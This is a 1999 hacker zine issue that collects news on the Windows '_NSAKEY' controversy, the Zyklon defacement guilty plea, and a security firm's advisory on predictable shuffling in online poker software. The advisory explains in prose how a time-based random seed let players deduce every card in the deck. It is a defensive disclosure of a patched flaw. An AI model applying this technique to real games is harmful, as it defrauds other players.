~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (No mail worthy of posting here this issue,) Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... ============================================================================== 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* This issue is a little late, sorry 'bout that but I got a new toy * and have been spending time setting it up and playing with it, its * a PII 400 with Voodoo III 3000 and a Diamond Monster sound 3d card * with a 19" monitor and 10 gig hd plus a DVD drive and HP 8100 CDRW * all that connects to a soho 5 port CAT5 hub which goes out to the * cablemodem, my other system will be delegated to FreeBSD and the * Linux box remains untouched. FreeBSD will be bestowed with a 13G * HD and I am probably going to bring Linux 'up front' as a proxy * and shell server at some point... so yay me * * This issue has a couple of articles contributed by wyzewun of FK * (Forbidden Knowledge) a .ZA zine that sheds some light on the hack * / security scene in South Africa so read on and enjoy the issue... * * Cruciphux */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 NSA Key Found in Windows ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by netmask Over the weekend a cryptography key with the label of NSA has been found within MS Windows. Some have immediately assumed that this was a back door that would allow the National Security Agency access to any Windows based system. Microsoft has vehemently denied the charge. Others have have also stated that such a conclusion, while possible, is unlikely. The most likely scenario is that the key was included to pass export restrictions set up by the NSA and was therefore labeled appropriately. Wired http://www.wired.com/news/news/technology/story/21577.html Wired - Second Story http://www.wired.com/news/news/technology/story/21589.html Associated Press - Via San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/ap/docs/817660l.htm ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2328464,00.html The Australian Age http://www.theage.com.au/daily/990904/news/news50.html OSALL - Review of the Aftermath http://www.aviary-mag.com/News/NSA_FUD/nsa_fud.html Microsoft - The Response http://www.microsoft.com/presspass/press/1999/Sept99/RSAPR.htm The real interesting part of this whole story is that this isn't new. This issue is over three years old. JYA.com http://jya.com/msnsa-not.htm -=- Wired; MS Denies Windows 'Spy Key' by Steve Kettmann and James Glave 10:20 a.m. 3.Sep.99.PDT Microsoft is vehemently denying allegations by a leading cryptographer that its Windows platform contains a backdoor designed to give a US intelligence agency access to personal computers. Andrew Fernandes, chief scientist for security software company Cryptonym in Mississauga, Ontario, claimed on his Web site Friday that the National Security Agency may have access to the core security of most major Windows operating systems. "By adding the NSA's key, they have made it easier -- not easy, but easier -- for the NSA to install security components on your computer without your authorization or approval," Fernandes said. But Microsoft denied that the NSA has anything to do with the key. "The key is a Microsoft key -- it is not shared with any party including the NSA," said Windows NT security product manager Scott Culp. "We don't leave backdoors in any products." Culp said the key was added to signify that it had passed NSA encryption standards. Fernandes also simultaneously released a program on his site that will disable the key. The key exists in all recent versions of the Windows operating systems, including Windows 95, 98, 2000, and NT. The issue centers around two keys that ship with all copies of Windows. The keys grant an outside party the access it needs to install security components without user authorization. The first key is used by Microsoft to sign its own security service modules. Until late Thursday, the identity and holder of the second key had remained a mystery. In previous versions of Windows, Fernandes said Microsoft had disguised the holder of the second key by removing identifying symbols. But while reverse-engineering Windows NT Service Pack 5, Fernandes discovered that Microsoft left the identifying information intact. He discovered that the second secret key is labeled "_NSAKEY." Fernandes and many other security experts take that to stand for the National Security Agency -- the nation's most powerful intelligence agency. Microsoft said _NSAKEY signifies that it satisfies security standards. Through its "signals intelligence" division the NSA listens in on the communications of other nations. The NSA did not immediately respond to a request for comment via fax, the only way the agency communicates with inquiries from the media. The agency also operates Echelon, a global eavesdropping network that is reportedly able to intercept just about any form of electronic communications anywhere in the world. The agency is forbidden by law from eavesdropping on American citizens. Marc Briceno, director of the Smartcard Developer Association, said the inclusion of the key could represent a serious threat to e-commerce. "The Windows operating-system-security compromise installed by Microsoft on behalf of the NSA in every copy of Windows 95, 98, and NT represents a serious financial risk to any company using MS Windows in e-commerce applications," Briceno wrote in an email. "With the discovery of an NSA backdoor in every copy of the Windows operating systems sold worldwide, both US and especially non-US users of Microsoft Windows must assume that the confidentiality of their business communications has been compromised by the US spy agency," Briceno said. Briceno coordinated the team that broke the security in GSM cell phones, demonstrating that the phones are subject to cloning -- a feat the cellular industry had thought impossible. In making the discovery, Fernandes said he did not know why the key was there. "It could be for espionage. It may not be," he said. "It does not totally compromise Windows, it only weakens it.... The only real reason I can see is for them to be able to install their own security providers." But Microsoft's Culp said all cyrptographic software intended for export must be submitted to a National Security Agency review process. He said that the key was so named to indicate that it had completed that process and that it complied with export regulations. "The only thing that this key is used for is to ensure that only those products that meet US export control regulations and have been checked can run under our crypto API (application programming interface)," Culp said. "It does not allow anyone to start things, stop services, or allow anything [to be executed] remotely," he said. "It is used to ensure that we and our cryptographic partners comply with United States crypto export regulations.We are the only ones who have access to it." Fernandes made the discovery in early August, he said, but collaborated with the Berlin-based Chaos Computer Club and other experienced hackers worldwide before releasing the information. "We coordinated this through the worldwide hacker scene," said Andy Muller-Maguhn of the CCC. "It was important to American hackers that it not only be mentioned in America but also in Europe. "For American citizens it seems to be normal that the NSA is in their software. But for countries outside of the United States, it is not. We don't want to have the NSA in our software." Coming less than a week after Microsoft was rocked by the embarrassing news that its Hotmail system could be easily penetrated, the latest disclosure could prove damaging to the software giant. "Say I am at a large bank, and I have the entirety of our operation working on Windows," Fernandes said. "That is a little more serious. The only people who could get in there are the NSA, but that might be bad enough. "They have to first manage to download a file into your machine. There may be backdoors that allow them to do that.... Iwould be shocked and surprised if the NSA bothered with individuals. What is more of a concern is security systems for a large bank or another data center. Or even a Web server firm. "The result is that it is tremendously easier for the NSA to load unauthorized security services on all copies of Microsoft Windows, and once these security services are loaded, they can effectively compromise your entire operating system. "The US government is currently making it as difficult as possible for 'strong' crypto to be used outside of the US; that they have also installed a cryptographic backdoor in the world's most abundant operating system should send a strong message to foreign IT managers," he said. But Fernandes did not want to set off a panic -- or at least not for everyone. "I personally don't care if the NSA can get into my machine, because I think they have better ways of spying on me as a person," Fernandes said. "But if I was a CEO of a large bank, that would be a different story." Before Microsoft's explanation, many leading cryptographers said they were convinced it was a key for the NSA. "I believe it is an NSA key," said Austin Hill, president of anonymous Internet service company Zero-Knowledge Systems. "We walked though it and talked about all the scenarios why it is there, and this was our conclusion," said Hill. He said that he and Zero-Knowledge's chief scientist, Ian Goldberg, did not believe the key's name is a joke placed there by a Microsoft programmer -- one possible explanation. "Microsoft has not shown incredible competence in the area of security," Hill added. "We call on Microsoft to learn about open security models that provide independent verification of design. No secure system is based on security by obscurity." -=- Wired #2; Debate Flares over MS 'Spy Key' by James Glave 3:00 a.m. 4.Sep.99.PDT Questions lingered Friday over whether or not security experts overreacted to a scientist's charge that Microsoft built a backdoor in Windows for a US spy agency to enter. Microsoft vehemently denied the claims of Andrew Fernandes, chief scientist for security software company Cryptonym. "It is a non-story," Microsoft Windows NT security product manager Scott Culp told Wired News. "We don't leave backdoors in any products." See also: MS Denies Windows 'Spy Key' In an early Friday statement posted to his company's Web site, Fernandes had claimed that Microsoft had granted the National Security Agency secret access to the core security of most major Windows operating systems. He made his claims after discovering the name of a key that grants access to the highest level of Windows data-scrambling software code, without the user's permission. The key is named _NSAKEY. The charges seemed to confirm the worst fears of many, and Internet mailing lists erupted early Friday in a Krakatoa of anti-Microsoft sentiment. "Windows is compromised!! Microsoft is in bed with the Federal Government," wrote one poster to a mailing list addressing privacy and crypto issues. The climate was certainly primed for hysteria. Last week, experts uncovered a major flaw in the way Microsoft implements the Java computer language. The company had barely addressed that problem when a gaping hole exposed the private email of potentially millions of Hotmail members -- perhaps the most widespread security incident in the Web history. Microsoft dismissed Friday's charges as nonsense. The company said that the key was named after the spy agency merely to reflect the fact that it had passed a technical review that the agency requires of all security software intended for export. But Fernandes stood his ground. "Some of the things [Microsoft said] make sense, some of them don't," he said. The _NSAKEY is one of two such keys buried deep in the cryptography source code of most Windows operating systems. In other reports, Microsoft said that the _NSAKEY is still a Microsoft-controlled key that will serve as a backup in the event that the first key is compromised. That just doesn't make sense, Fernandes said. "If they lost the first key which is the equivalent to them losing the Windows source code, then that would be okay,they could just start using the backup key." "But if all of Windows was compromised [by a hacker], they would have to reissue all of Windows and overwrite [the second key] on top of all copies of Windows out there, which can happen, but it's unlikely." "Their story only kind of makes sense," he added. "If that is in fact true, it means their crypto protocol is poor, there is no other word for it." Crypto expert Marc Briceno did have another word for it: "feeble." "I must say I do not believe Microsoft's present explanation that the presence of the _NSAKEY corresponds to standard practices in software development," said Marc Briceno, director of the Smartcard Developer Association. "There is no technical reason for Microsoft to include a second security module verification key in their operating system ... to mark the passing of export requirements," Briceno said. But a respected independent Windows NT security consultant said that in the wake of Microsoft's denials, the NSA backdoor allegations amount to conspiracy theories. "There's a bunch of somewhat understandable furor going on over the idea that the NSA might have a backdoor to Windows," wrote Russ Cooper, moderator of the NTBugtraq Windows security resource. "Unfortunately, however, all of this is based on a variable name," he added. Anyone who programs knows that variables might get named anything for a variety of reasons." He said the lion's share of individuals overreacting to the claims are freedom fighters and privacy advocates. "Unfortunately they have a loud voice," he said. "I don't think they are representative of the average person, the real people that populate the Net," he said. "We give away all kinds of things, every day, that sacrifice our privacy. These privacy advocates, I'd put them in the category of the Michigan Militia, the Ruby Ridge folks." But John Gilmore, a co-founder of the Electronic Freedom Foundation, said that the case was far from clear. Gilmore quoted Microsoft's Scott Culp,who said in a previous Wired News story that the _NSAKEY was only in place "to ensure that we and our cryptographic partners comply with United States crypto export regulations." Gilmore said that the crypto community has always wondered what exactly the deal was between NSA and Microsoft that allows the company to plug strong crypto into software that is sold worldwide. Culp's response was "disingenuous but not false," he wrote in an email to Wired News. "This key was part of the quid-pro-quo that NSA extracted to issue the export license. Let's hear what the whole quid-pro-quo was and what the key is *actually* used for," Gilmore wrote. For its part, the NSA isn't telling. In a short faxed reply to a Wired News query about the purpose of the key, the super-secretive agency said the matter was up to Microsoft. "US export control regulations require that cryptographic [application program interfaces] be signed," NSA's public affairs office wrote. "The implementation of this requirement is left up to the company. Specific questions about specific products should be addressed to the company." Associated Press story; Microsoft denies helping govt snoop BY TED BRIDIS Associated Press Writer WASHINGTON (AP) -- Microsoft Corp. sought to assure consumers Friday that it did not insert a secret backdoor in its popular Windows software to allow the U.S. government to snoop on their sensitive computer data. The sensational charge of a quiet alliance between Microsoft and the U.S. National Security Agency came after a Canadian programmer stumbled across an obscure digital ``signing key'' that had been labeled the ``NSA key'' in the latest version of Microsoft's business-level Windows NT software. An organization with such a signature key accepted by Windows could theoretically load software to make it easier to look at sensitive data -- such as e-mail or financial records -- that had been scrambled. The flaw would affect almost any version of Windows, the software that runs most of the world's personal computers. Microsoft forcefully denied that it gave any government agency such a key, and explained that it called its function an ``NSA key'' because that federal agency reviews technical details for the export of powerful data-scrambling software. ``These are just used to ensure that we're compliant with U.S. export regulations,'' said Scott Culp, Microsoft's security manager for its Windows NT Server software. ``We have not shared the private keys. We do not share our keys.'' The claim against Microsoft, originally leveled by security consultant Andrew Fernandes of Mississauga, Ontario, on his Web site, spread quickly in e-mail and discussion groups across the Internet, especially in those corners of cyberspace where Microsoft and the federal government are often criticized. Culp called Fernandes' claims ``completely false.'' An NSA spokesman declined immediate comment. Bruce Schneier, a cryptography expert, said the claim by Fernandes ``makes no sense'' because a government agency as sophisticated as the NSA doesn't need Microsoft's help to unscramble sensitive computer information. ``That it allows the NSA to load unauthorized security services, compromise your operating system -- that's nonsense,'' said Schneier, who runs Counterpane Internet Security Inc. ``The NSA can already do that, and it has nothing to do with this.'' Fernandes, who runs a small consulting firm in Canada, said he found the suspiciously named ``NSA key'' -- along with another key for Microsoft -- while examining the software code within the latest version of Windows NT. The existence of the second key was discovered earlier by other cryptographers, but Fernandes was the first to find its official name and theorize about its purpose. ``That (the U.S. government) has ... installed a cryptographic back door in the world's most abundant operating system should send a strong message to foreign (information technology) managers,'' he warned on his Web site. But Fernandes seemed less worried Friday in a telephone interview. ``I don't know that they have reason to lie,'' he said. ``The main point is, you can't really trust what they're saying. They've been caught with their hand in the cookie jar. In fact, I think they're being fairly honest, but you don't know what else is in Windows.'' -=- ZDNET; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- MS denies giving NSA key By Lisa M. Bowman, ZDNN September 3, 1999 3:03 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2328464,00.html Updated at 6:20 PM PT Microsoft is denying claims by a Canadian security company that it has installed a second key in its Windows programs in order to give the U.S. government access to users' computers. Intead, it said it's only following the rules imposed by the U.S. to allow software exports. Andrew Fernandes, the chief scientist of Cryptonym, had claimed that a second key in several versions of the company's Windows operating system contains coding using the letters "NSA," which he said indicated that Microsoft (Nasdaq:MSFT) may be providing a key for the National Security Agency. But Microsoft said it's not, and calls the incident a "tempest in a teapot." Instead, Windows NT security product manager Scott Culp said the company was merely complying with federal rules imposed by the U.S. Commerce Department and NSA to meet export control requirements. Culp said the keys have been used for years to verify the digital signatures of partner companies using its crypto application programming interface (API), and to verify that they're export approved. "They're in there because that's how we comply with export controls that the NSA is overseeing," he said. Bad name But he acknowledges the term "NSA" key could arouse suspicion. "It's a really bad name," he said. "I think we're going to rename it after today." The keys are in every copy of Windows 95, 98, NT4 and 2000. The owner of such keys could potentially infiltrate software by using them to go through a so-called "back door" in the software. Because the U.S. government limits the export of strong encryption software, some software makers provide such keys to the government. But Microsoft said it's doing no such thing. "It's totally against our corporate policy," Culp said. The NSA faxed a statement deferring specific questions to Microsoft. Fernandes started his work last year, after two software developers discovered the presence of a second key, but said they didn't know why it was created. Fernandes piggy-backed on that research to learn more about the second key. *** The good news, Fernandes said, is that companies can use a security flaw in the NSA key to add their own strong encryption, in effect overriding the key. More information is at the Cryptonym site. However, even Fernandes said he didn't know for sure if the NSA coding in Windows really refers to the government agency. "I'm in the security business, and the security business is the business of paranoia," he said. Security consultant Richard Smith, president of Phar Lap Software, said the discovery was a minor one. "As in most cases, where there's smoke there's usually fire," he said. "But in my opinion this isn't a very big fire." Fernandes' claim came just two weeks after news began circulating that the U.S. Department of Justice was asking for special legislation that would let them spy on computers without a warrant or a user's knowledge. -=- The Australian Age; Microsoft denies it gives government access to Windows By Ted Bridis WASHINGTON, Sept 4 AP - Microsoft Corp sought to assure consumers that it did not insert a secret backdoor in its popular Windows software to allow the US government to snoop on their sensitive computer data. The sensational charge of a quiet alliance between Microsoft and the US National Security Agency came after a Canadian programmer stumbled across an obscure digital ``signing key'' that had been labeled the ``NSA key'' in the latest version of Microsoft's business-level Windows NT software. An organisation with such a signature key accepted by Windows could theoretically load software to make it easier to look at sensitive data _ such as e-mail or financial records _ that had been scrambled. The flaw would affect almost any version of Windows, the software that runs most of the world's personal computers. Microsoft forcefully denied yesterday that it gave any government agency such a key, and explained that it called its function an ``NSA key'' because that federal agency reviews technical details for the export of powerful data-scrambling software. ``These are just used to ensure that we're compliant with US export regulations,'' said Scott Culp, Microsoft's security manager for its Windows NT Server software. ``We have not shared the private keys. We do not share our keys.'' The claim against Microsoft, originally leveled by security consultant Andrew Fernandes of Mississauga, Ontario, on his Web site, spread quickly in e-mail and discussion groups across the Internet, especially in those corners of cyberspace where Microsoft and the federal government are often criticised. Culp called Fernandes' claims ``completely false.'' An NSA spokesman declined immediate comment. Bruce Schneier, a cryptography expert, said the claim by Fernandes ``makes no sense'' because a government agency as sophisticated as the NSA doesn't need Microsoft's help to unscramble sensitive computer information. ``That it allows the NSA to load unauthorised security services, compromise your operating system _ that's nonsense,'' said Schneier, who runs Counterpane Internet Security Inc. ``The NSA can already do that, and it has nothing to do with this.'' Fernandes, who runs a small consulting firm in Canada, said he found the suspiciously named ``NSA key'' _ along with another key for Microsoft _ while examining the software code within the latest version of Windows NT. The existence of the second key was discovered earlier by other cryptographers, but Fernandes was the first to find its official name and theorise about its purpose. ``That (the US government) has ... installed a cryptographic back door in the world's most abundant operating system should send a strong message to foreign (information technology) managers,'' he warned on his Web site. But Fernandes seemed less worried yesterday in a telephone interview. ``I don't know that they have reason to lie,'' he said. ``The main point is, you can't really trust what they're saying. They've been caught with their hand in the cookie jar. In fact, I think they're being fairly honest, but you don't know what else is in Windows.'' -AP -=- OSALL Review of the aftermath; NSA Crypto API Key FUD Mike Hudack Editor-in-Chief Some people can claim to have never spread FUD (Fear, Uncertainty and Doubt) in their lives. I guess I can no longer claim such a distinction. I came home from school on Friday around 2:45 (seven or so hours ago) to more than fifty e-mails asking me about the NSA key included in Windows. I moved fast -- too fast. I wrote a story on it, quoting sources I had already read and referencing those sources. About half an hour ago I changed the story slightly, making it clear that we had not independantly confirmed the action of this second key in the Microsoft Crypto API. The slightly revised article is still here as NSA Backdoor. I moved quickly, calling my media contacts to ensure they knew what was going on. CNN was already working on a story and others had already run with it. Some were waiting for more word. Pressed with Internet time, everyone who was publishing on the Web had already gone with the story, some more tentatively than others. As time went on I began to realize there were a few things wrong with the conclusions being drawn. I didn´t want to reverse my position too soon though, and I kept pushing my opinions -- and my natural distrust for the NSA and Microsoft -- although less strenuously. It was around seven o´clock in the evening that I realized something was wrong. The second key included in the Crypto API may have been inserted by the NSA (hence the name) as a backup to the Microsoft key -- and intended only for use on NSA machines. There were a dozen possible explanations, some discussed in the article NSA Ramifications on OSAll. At eight o´clock I began writing this article, double-checking my sources. My NSA contact had called me around nine and told me "I have no idea what´s going on. We use NT for a couple things and install some Crypto API programs for tests." That was part of the last straw for me... That and Russ Cooper´s wonderful posting to NT Bugtraq did it for me (hopefully we´ll get permission from Russ to publish that post here -- it´s pending). I´m making no excuses for helping to spread FUD through my over-eager analyzation and reporting, but the pressures of Internet time -- and the lost time of school -- were major issues. -=- Microsoft's spin; Microsoft Says Speculation About Security and NSA Is "Inaccurate and Unfounded" REDMOND, Wash. - Sept. 3, 1999 - Microsoft Corp. said today that speculation about Microsoft® Windows® security and the U.S. National Security Agency (NSA) is "inaccurate and unfounded." In response to speculation by a Canadian cryptography company that Microsoft had somehow allowed the NSA to hold a "backdoor" key to the encryption framework in its Windows operating system, Microsoft issued the following statement: "This report is inaccurate and unfounded. The key in question is a Microsoft key. It is maintained and safeguarded by Microsoft, and we have not shared this key with the NSA or any other party. "Microsoft takes security very seriously. This speculation is ironic since Microsoft has consistently opposed the various key escrow proposals suggested by the government because we don't believe they are good for consumers, the industry or national security. "Contrary to this report, the key in question would not allow security services to be started or stopped without the user's knowledge." Microsoft said the key is labeled "NSA key" because NSA is the technical review authority for U.S. export controls, and the key ensures compliance with U.S. export laws. The company reiterated that Microsoft has not shared this key with the NSA or any other company or agency. Founded in 1975, Microsoft (Nasdaq "MSFT") is the worldwide leader in software for personal computers. The company offers a wide range of products and services for business and personal use, each designed with the mission of making it easier and more enjoyable for people to take advantage of the full power of personal computing every day. Microsoft and Windows are either registered trademarks or trademarks of Microsoft Corp. in the United States and/or other countries. Other product and company names herein may be trademarks of their respective owners. Note to editors: If you are interested in viewing additional information on Microsoft, please visit the Microsoft Web page at http://www.microsoft.com/presspass/ on Microsoft's corporate information pages. -=- JYA's take on the whole deal; From: "Brian Gladman" To: "UK Crypto List" Subject: Re: NSA key in Windows Date: Mon, 6 Sep 1999 14:23:33 +0100 I am always surprised about just how long it takes to recognise the political implications of simple technological decisions. The Microsoft CAPI issue is well over ***three years old*** and to illustrate this here is a URL for a paper that I wrote in early 1996 to try and get action from the UK government and from the EU when this issue first arose: http://www.seven77.demon.co.uk/capi.pdf [HTML below] In my view the real issue here is not an NSA backdoor (I doubt that one exists in the form postulated) but rather the principle that Microsoft should allow the US government to impose its cryptographic export controls on other sovereign countries by controlling access to the relevant interfaces for integrating cryptographic Service Providers (CSPs) into Windows. When this was topical back in 1996 I objected vigorously to this approach (with ***support*** from GCHQ/CESG!) It took a lot of effort but the UK, at least, did establish a Microsoft UK based capability for signing cryptographic modules separate from that in the US. I might also add that I had access in the UK to the Microsoft CSPDK (Cryptographic Service Provider Developer Kit) in 1997 and the keys now being discussed were openly a part of the CSPDK at the time. If this was an NSA backdoor then they did not make a very good job of hiding it! Hence, while I believe that Microsoft should be criticised for allowing itself to be used by the US government to impose extra-territorial controls on crypto, I am very doubtful that they co-operated in the provision of any backdoor of the form now proposed. Brian @HWA 04.0 Online Gambling is not Secure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Mathew Besides worrying about how secure your personal information is you now also have to worry about whether the software you are using is playing fair. Reliable Software Technologies has uncovered a serious flaw in the implementation of Texas Hold 'em Poker that is distributed by ASF Software, Inc.. This software is used by www.planetpoker.com, www.purepoker.com, and www.deltacasino.com all of whom have been notified of this flaw. The flaw exists in the card shuffling algorithm used to generate each deck which allows a malicious user to know the cards in each players hand in real time. Reliable Software Technologies http://www.rstcorp.com/news/gambling.html CNN http://www.cnn.com/TECH/computing/9909/03/internet.poker/index.html (Video stream) -=- Reliable Software Technologies FOR IMMEDIATE RELEASE September 1, 1999 Press Contact Information Internet Gambling Software Flaw Discovered by Reliable Software Technologies Software Security Group Dulles, VA - The Software Security Group at Reliable Software Technologies, the leading authority and industry visionary on software assurance for security-critical software, today announced the discovery of a major security flaw in Internet Gambling software. The flaw can be exploited to bilk innocent players of actual money in online poker games. Regardless of its quasi-legal status, online gambling presents an entire raft of risks. Key questions include: Will your personal information be handled securely (for example, will the credit card number you're paying with be stolen or the fact that you're gambling at all be leaked)? What if the gaming site is hacked? Could you be playing against cheating insiders or players acting in collusion? Are the games implemented correctly and fairly? Is the software secure? In response to the last question, we have demonstrated that the answer is no. The Software Security Group at Reliable Software Technologies has discovered a serious flaw in the implementation of Texas Hold 'em Poker that is distributed by ASF Software, Inc.. We have exploited this flaw in the lab. Our exploit allows a player (us) to calculate the exact deck being used for each hand in real time. That means a player using our exploit knows the cards in every opponent's hand as well as the cards that will make up the flop (cards placed face up on the table after rounds of betting). We can always make the right decision, and consequently maximize our earnings. A malicious attacker could use our exploit to bilk innocent players of actual money without ever being caught. ASF Software and all of their online casino customers have been notified of the flaw. Currently we know of three online casinos (www.planetpoker.com, www.purepoker.com, and www.deltacasino.com) that appear to use ASF Software's implementation of Texas Hold 'em Poker. All three Websites allow players to compete for real money. There is also a demo casino that allows players to gamble with play money. We used our exploit against the demo casino. We also demonstrated, without actually cheating, that it could be used against real money casinos. The flaw exists in the card shuffling algorithm used to generate each deck. Ironically, the code was publicly displayed at www.planetpoker.com/ppfaq.htm with the idea of showing how fair the game is to interested players (the relevant question has since been removed). In the code, a call to randomize() is included to produce a random deck before each deck is generated. The implementation, built with Delphi 4 (a Pascal IDE), seeds the random number generator with the number of milliseconds since midnight according to the system clock. That means the output of the random number generator is easily predicted. A predictable "random number generator" is a very serious security problem. The scenario below illustrates the problem. The first screen shows an actual game in progress. In this scene, we are jonnyboy (whose cards are shown face up) and three "flop" cards are displayed. Two other players are participating, but their cards are not displayed (for obvious reasons). Click to enlarge By synchronizing our clock with the clock on the online casino and hitting the "shuffle" button, our program can calculate the exact shuffle. That means we know all the cards that have yet to appear, everyone's hand, and who will win. The screen shot below shows the information displayed by our program in realtime during an actual game. Our program knows what cards are to appear in advance, before they are revealed by the online game. Click to enlarge As you can see in the screen shown below, taken at the conclusion of the demonstration game, our program has correctly determined all the cards. Given our program, a malicious user would know when to hold 'em and know when to fold 'em with 100% accuracy. This information can be used to win money from unsuspecting players. Click to enlarge A typical hand involves $30-1000 in the pot. We estimate over $100,000 worth of money changes hands daily on the four most popular online poker sites. There are a number of other problems in the poker implementation that could lead to complete security compromise. We have only exploited the easiest one at this time. The broad take home message from this work is simple: when software misbehaves, bad things can happen. Our mission in the Software Security Group is to stamp out insecure code before it is placed in service. Members of the group involved with the Gambling exploit are: Brad Arkin, Frank Hill, Scott Marks, Matt Schmid, and TJ Walls. The Software Security Group is led by Dr.Gary McGraw. About RST Headquartered in Dulles, VA, Reliable Software Technologies Corp. (RST) is a leading authority and industry visionary on software assurance for critical software. Founded on the simple, compelling premise that software must work, the company offers technology and services that help organizations deliver reliable, robust, and secure software - the essence of software assurance. With expertise in test optimization, security and metrics, RST helps corporations, independent software vendors and system integrators optimize time spent in development and test, dramatically accelerating time-to-market. Learn more about RST on the Web at http://www.rstcorp.com/. Press Contact Information Gary McGraw Reliable Software Technologies 703 404-9293 gem@rstcorp.com More Technical Details; Internet Gambling Software Flaw: More Details Playing poker is risky by nature, but playing online poker for real money may be more of a gamble than you ever expected. The Software Security Group at Reliable Software Technologies (www.rstcorp.com) has discovered a serious flaw in the implementation of Texas Hold 'em Poker that is distributed by ASF Software, Inc. (www.asfgames.com). We were able to develop a program that exploits this flaw and is capable of determining the exact ordering of every card in a shuffled deck; this computation can be performed in real-time, during the playing of an actual poker game. This exploit enables someone to know every card that each player has been dealt and what cards will be coming up during the rest of the hand. Given this information, even the weakest of poker players should know when to hold'em, and when to fold'em. Unlike most casino games, poker is played against other players, not against the house. This means that when someone is cheating at poker, innocent people are hurt by the cheater's unscrupulous actions. ASF Software has been notified of the flaw in their system and has taken corrective actions. The exploit that Reliable Software Technologies developed no longer functions, however the potential for people to take advantage of flaws in online gambling software remains. The flaw existed in the algorithm used to produce a shuffled deck of cards before each round of play. Ironically, the code was publicly displayed at www.planetpoker.com/ppfaq.htm with the idea of showing how fair the game is to interested players (the page has since been taken down). The algorithm revealed that the cards were being shuffled using random numbers generated by the Delphi Pascal Random() function. Like most common random number generators, the Random() call uses the Lehmer algorithm to produce streams of pseudo-random numbers. These numbers have many of the mathematical properties associated with random numbers, however they are generated in a completely deterministic manner. This means that given a particular starting point (the random number generator's "seed") the sequence of numbers generated will follow an easily calculated pattern. The shuffling algorithm used in this software always started with an ordered deck of cards, and then generated a sequence of random numbers that were used to re-order the deck. The seed for a 32-bit random number generator must be a 32-bit number, meaning that there are just over 4 billion possible seeds. This constrains the algorithm to being able to produce only slightly more that 4 billion possible decks of cards; a number much smaller than the 52 factorial (52 * 51 * 50 * … 1) combinations possible in a real deck of cards. The resulting number is close to 2^225. To make matters worse, the algorithm chose the seed for the random number generator using the Pascal function Randomize(). The Randomize() function chose a seed based on the number of milliseconds since midnight. Since there are only 86,400,000 milliseconds in a day, and this number was being used as the seed for the random number generator, the number of possible decks was now reduced to 86,400,000. By synchronizing our program with the system clock on the server generating the pseudo-random number, we were able to further reduce the number of possible combinations down a number on the order of 200,000 possibilities. Searching through this set of shuffles is trivial and can be done on a PC in real time. The exploit that RST developed required that five cards from the deck were known, and the rest of the deck could then be deduced. In Texas hold'em poker, this meant that the program took as input the two cards that a player is dealt, plus the first three community cards that are dealt face up (called the flop). These five cards are known after the first of four rounds of betting. The program then generated shuffled decks of cards until it found a deck that contained these five cards in the proper positions. Since the Randomize() function is based on the server's system time, it was not very difficult to guess a starting seed with a fair degree of accuracy. After finding a correct seed once, it is then possible to synchronize the exploit program with the server to within a few seconds. This synchronization enables the exploit program to accurately guess the seed being used by the random number generator, and to identify the deck of cards being used during all future games in under one second! Although this particular security flaw has been patched, there is an important lesson that can be learned by both online game enthusiasts and software developers. Developing software for critical systems is a difficult and misunderstood topic. When the stakes are high, it pays to go to great lengths to ensure that software is been implemented with proper considerations for security and safety. If it is not, innocent people may be hurt or taken advantage of. A developer must understand the risks that are introduced by his / her code, and a system user must be convinced that such risks have been mitigated. At Reliable Software Technologies, our mission in the Software Security Group is to stamp out insecure code before it is placed in service. Members of the group involved with the Gambling exploit are: Brad Arkin, Frank Hill, Scott Marks, Matt Schmid, and TJ Walls. The Software Security Group is led by Dr.Gary McGraw. Matt Schmid Reliable Software Technologies mschmid@rstcorp.com @HWA 05.0 Zyklon Pleads Guilty ~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond Zyklon (Eric Burns) has pleaded guilty to charges of defacing the web pages of NATO, Vice President Al Gore, and the United States Information Agency (USIA). Zyklon also admitted that he advised others on how to attack www.whitehouse.gov last May. Zyklon faces a maximum of five years in prison and a $250,000 fine, and possible restitution. His sentencing is scheduled for November 19, 1999. C|Net http://www.news.com/News/Item/Textonly/0,25,41358,00.html?pfv Cracker admits to invading government Web sites By Reuters Special to CNET News.com September 7, 1999, 3:05 p.m. PT URL: http://www.news.com/News/Item/0,4,41358,00.html WASHINGTON--A 19-year-old computer cracker with the screen name "Zyklon" pleaded guilty today to attacks involving Web pages for NATO, Vice President Al Gore, and the United States Information Agency (USIA), prosecutors said. Prosecutors from the U.S. Attorney's Office said Eric Burns of Shoreline, Washington, also admitted in federal court in Alexandria, Virginia, that he had advised others on how to attack the White House Web site in May. They said Burns faces a maximum possible punishment of five years in prison and a $250,000 fine, and he could have to pay restitution. His sentencing is scheduled for November 19 before U.S. District Judge James Cacheris. Burns acknowledged that the computer intrusions caused damages exceeding $40,000, the prosecutors said. He admitted to cracking computers in Virginia, Washington state, London, and Washington, D.C. Prosecutors said Burns designed a program called "Web bandit" to identify computers on the Internet vulnerable to attack. He found that the computer server at Electric Press in Reston, Virginia, was vulnerable and attacked it four times between August 1998 and January 1999, they said. Electric Press hosted the Web pages for NATO, the vice president, and USIA. Prosecutors said the attacks affected U.S. embassy and consulate Web sites, which depended on the USIA for information. One attack resulted in the closing down of the USIA Web site for eight days, they said. Prosecutors said Burns attacked the Web pages of about 80 businesses whose pages were hosted by Laser.Net in Fairfax, Virginia; the Web pages of two corporate clients of Issue Dynamics in Virginia and Washington, D.C.; and the University of Washington Web page. They said Burns also attacked an Internet service provider in London. Burns usually replaced the Web pages with his own, which often made references to 